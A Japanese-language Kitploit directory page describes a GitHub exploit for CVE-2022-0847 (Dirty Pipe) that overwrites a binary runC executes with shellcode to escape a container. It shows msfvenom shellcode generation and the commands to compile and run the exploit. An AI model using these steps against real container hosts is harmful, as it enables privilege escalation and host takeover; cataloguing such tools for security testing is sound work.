Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-0847-container-escape — dirtypipeを使用してrunCのエントリポイントにshellcodeを注入し、コンテナエスケープを実現するシンプルなエクスプロイトです。 | Kitploit
ツール/GitHubGitHub/jlsakuya/cve-2022-0847-container-escape
特権昇格ペイロード生成脆弱性分析エクスプロイトシェルコードコンテナエスケープ
GitHubjlsakuya/cve-2022-0847-container-escape

CVE-2022-0847-container-escape

dirtypipeを使用してrunCのエントリポイントにshellcodeを注入し、コンテナエスケープを実現するシンプルなエクスプロイトです。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2143年前未レビュー

CVE-2022-0847

dirtypipeを使用してrunCエントリポイントにシェルコードを注入し、コンテナエスケープを実現するシンプルなエクスプロイトです。

使用法

msfを使用してbase64エンコードされたシェルコードを生成します:

root@kitploit:~
$ msfvenom -p linux/x64/exec CMD="<command>" -f base64

コンテナ内でコンパイルして実行します。上書きされるファイル名は、runCがコンテナ内で実行するバイナリです(/bin/shなど):

root@kitploit:~
$ gcc exploit.c -o exploit
$ ./exploit <overwritten filename> <base64 shellcode>

CVE-2019-5736と同様に、コンテナの外部でエクスプロイトとシェルコードをトリガーします。

参照

  • runCを介したDockerからの脱出 – CVE-2019-5736の解説
  • Dirty Pipe脆弱性を使用したコンテナからの脱出
ツールをダウンロード